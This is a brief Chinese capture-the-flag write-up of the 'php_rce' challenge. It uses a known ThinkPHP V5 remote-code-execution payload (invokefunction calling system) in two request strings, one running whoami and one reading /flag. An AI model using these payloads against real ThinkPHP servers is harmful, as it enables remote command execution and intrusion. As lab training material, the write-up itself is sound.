攻防世界php_rce
php_rce
进入题目提示为ThinkPHP V5
遇到这种题我们一般去找一下框架的rce漏洞即可,搜索到这样一篇文章
https://www.freebuf.com/articles/web/289860.html
然后我们直接使用这里面的payload
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
成功rce
接下来就是找flag的游戏了,在根目录下发现了flag我们cat一下
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag
浙公网安备 33010602011771号